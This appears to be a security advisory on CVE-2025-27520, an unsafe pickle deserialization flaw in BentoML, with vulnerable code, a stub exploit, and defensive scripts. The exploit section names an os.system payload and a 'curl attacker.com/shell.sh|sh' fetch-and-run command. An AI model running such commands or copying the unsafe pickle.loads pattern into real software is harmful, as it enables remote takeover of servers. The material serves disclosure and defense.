CVE-2025-27520 - Critical RCE in BentoML (<1.4.3) — Unsafe Deserialization Leads to Remote Code Execution

BentoML is a popular open-source Python framework designed for serving ML/AI models at scale with minimal code. Organizations adopt it to deploy ML models as scalable, online APIs, making it central in data science and AI-driven companies’ stacks.

In April 2025, a critical security vulnerability, CVE-2025-27520, was publicly disclosed in BentoML versions before 1.4.3. It allows an unauthenticated, remote attacker to execute arbitrary code on the BentoML server because of unsafe deserialization in the module serde.py. The risk is extremely high: any remote user who can reach a vulnerable BentoML API can gain complete control over the backend server.

This post gives an exclusive, in-depth walk-through of the vulnerability, the technical root cause, code details, and a demonstration of exploitation.

> TL;DR:
> All BentoML users should immediately upgrade to v1.4.3 or later.
> Running any BentoML API endpoint exposed to external networks before 1.4.3 puts your server at critical risk of RCE.

[References](#references)

1. Background: BentoML & Serde

BentoML offers fast APIs for serving machine learning models. To move data between API endpoints and internal structures, BentoML serializes and deserializes Python objects, often using the Python pickle module (“serde” is short for “serialize/deserialize”).

However, Python’s built-in pickle module is *not safe* to use with untrusted data. A pickle stream can instruct the unpickler to call arbitrary callables, so if an attacker can get the server to “unpickle” bytes they control, they can make the server run arbitrary system commands.
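To make that concrete, here is a minimal local sketch of the mechanism. It touches no network and no BentoML code. The `Payload` class is a hypothetical name chosen for illustration, and `os.getcwd` is a deliberately harmless stand-in for the kind of callable an attacker would choose.

```python
import os
import pickle


class Payload:
    """Object whose pickled form tells the unpickler to call a function."""

    def __reduce__(self):
        # pickle records "call os.getcwd with no arguments" in the byte stream.
        # os.getcwd is a harmless stand-in; an attacker would pick a callable
        # such as os.system together with a command string.
        return (os.getcwd, ())


blob = pickle.dumps(Payload())

# Loading the bytes does not rebuild a Payload. It calls os.getcwd() and
# returns whatever that call returns.
result = pickle.loads(blob)
print(type(result).__name__, result)
```

The important point is that the call happens inside `pickle.loads` itself, before the application has any chance to inspect the resulting object.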

2. Root Cause Analysis

- Vulnerability Class: Unsafe Deserialization / Remote Code Execution (RCE)

What went wrong?

While processing model inference API requests, BentoML uses a custom serialization handler in bentoml/serde.py. The code trusts input from remote requests and deserializes it with pickle.loads() without any validation. This leaves a gaping hole: any attacker can send malicious pickle data, and the server will execute whatever code the payload specifies.

Below is the risky section from bentoml/serde.py (version 1.4.2):

# bentoml/serde.py (before 1.4.3)
import pickle

def deserialize(data: bytes):
    # UNSAFE: pickle.loads runs attacker-chosen callables on untrusted input!
    return pickle.loads(data)

This function may be called as part of request parsing or internal API translation, for example:

@app.api(input=SerializedInput(), output=SomeOutput())
def predict(input_data):
    obj = deserialize(input_data)  # RCE point!
    return model.predict(obj)

Why is this bad?
A remote user can craft a malicious pickle payload. If it reaches this function (via an API, web socket, or other external interface), arbitrary code can be executed as the bentoml process user.

4. Proof of Concept Exploit

Let’s show how easy it is to exploit this with a crafted remote POST request to the vulnerable API.

import requests

url = "http://vulnerable-bento-server:3000/api/predict"


A POST request whose body is a pickle payload built to call os.system('id') will, if routed to the vulnerable deserialization function, cause the server to run that command (or any other Python code or shell command the attacker chooses). The attacker could just as easily swap 'id' for 'curl attacker.com/shell.sh|sh'.

5. Mitigation

Upgrade BentoML to 1.4.3 or later immediately.

- The patched version replaces the unsafe pickle.loads usage, or ensures strict use of validated, type-restricted protocols.
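To confirm which side of the 1.4.3 boundary a given environment is on, a small check like the one below may help. It is only a sketch: `parse_version`, `is_vulnerable`, and `installed_bentoml_version` are hypothetical helper names, the "before 1.4.3" rule is taken from this post, and the parser handles plain `X.Y.Z` strings without any special treatment of pre-release suffixes.

```python
from importlib import metadata

# First fixed release according to this advisory.
PATCHED = (1, 4, 3)


def parse_version(text: str) -> tuple:
    """Parse a plain 'X.Y.Z' string; pre-release suffixes are ignored."""
    parts = []
    for piece in text.split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits or 0))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_vulnerable(version_text: str) -> bool:
    """True when the version sorts before the patched release."""
    return parse_version(version_text) < PATCHED


def installed_bentoml_version():
    """Return the installed bentoml version string, or None if not installed."""
    try:
        return metadata.version("bentoml")
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    found = installed_bentoml_version()
    if found is None:
        print("bentoml is not installed in this environment")
    else:
        status = "VULNERABLE, upgrade now" if is_vulnerable(found) else "patched"
        print(f"bentoml {found}: {status}")
```

Run it with the same interpreter that serves your models, since a virtual environment or container image may pin a different version than the system Python.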

Not sure if you’re exposed?

- Check for custom API endpoints using deserialize, or any direct usage of pickle.loads on external data paths.
- Audit logs for suspicious API activity—like strange binary POST bodies or commands executed by inference processes.
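The first check can be partly automated. The sketch below uses Python's `ast` module to flag direct `pickle.load` and `pickle.loads` calls in source files. The function names `find_pickle_calls` and `scan_tree` are hypothetical, and the scan is a starting point only: it will miss aliased imports such as `from pickle import loads`, and it cannot tell whether the data reaching a call is actually untrusted.

```python
import ast
from pathlib import Path

RISKY_CALLS = {("pickle", "load"), ("pickle", "loads")}


def find_pickle_calls(source: str, filename: str = "<string>") -> list:
    """Return sorted (line, call) pairs for pickle.load/pickle.loads calls."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if (
            isinstance(func, ast.Attribute)
            and isinstance(func.value, ast.Name)
            and (func.value.id, func.attr) in RISKY_CALLS
        ):
            findings.append((node.lineno, f"{func.value.id}.{func.attr}"))
    return sorted(findings)


def scan_tree(root: str) -> dict:
    """Scan every .py file under root; unreadable or unparsable files are skipped."""
    report = {}
    for path in Path(root).rglob("*.py"):
        try:
            hits = find_pickle_calls(path.read_text(encoding="utf-8"), str(path))
        except (SyntaxError, ValueError, UnicodeDecodeError, OSError):
            continue
        if hits:
            report[str(path)] = hits
    return report
```

Calling `scan_tree(".")` from a service's repository root returns a mapping of file paths to the lines that deserve a manual review.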

Place AI serving endpoints behind an authenticated API gateway.
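Where pickle cannot be removed from a code path right away, the allow-list pattern described in the Python pickle documentation offers some defense in depth. The sketch below is not the BentoML fix. `ALLOWED_GLOBALS` and `restricted_loads` are hypothetical names, and the single allow-listed entry is just an example.

```python
import io
import pickle

# Hypothetical allow-list: the only importable globals a payload may reference.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not explicitly allow-listed."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Drop-in analogue of pickle.loads that enforces the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Plain containers and scalars never reach find_class, so they still load.
print(restricted_loads(pickle.dumps({"features": [1.0, 2.5]})))
```

A payload that references any other callable, such as `os.system`, fails with `pickle.UnpicklingError` before the callable is invoked. Even so, a data-only format such as JSON remains the safer choice for anything that crosses a trust boundary.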

6. References

- BentoML official website
- Python pickle documentation (Security Note)
- NIST NVD Entry: CVE-2025-27520
- BentoML GitHub: Diff that fixes the bug
- OWASP: Deserialization of Untrusted Data

Conclusion

CVE-2025-27520 is a textbook example of the dangers of insecure deserialization in Python web apps. It’s critical for ML and AI API providers—particularly those open to the Internet—to treat user inputs as hostile, and to *never* use pickle.loads on data that’s not 100% trusted.

If you run any BentoML instance older than 1.4.3, patch ASAP and review your logs for suspicious activity. The window for silent exploitation is wide open.

Stay safe, and always audit your serialization pathways! 🚨

Timeline

Published on: 04/04/2025 15:15:47 UTC
Last modified on: 04/07/2025 14:18:15 UTC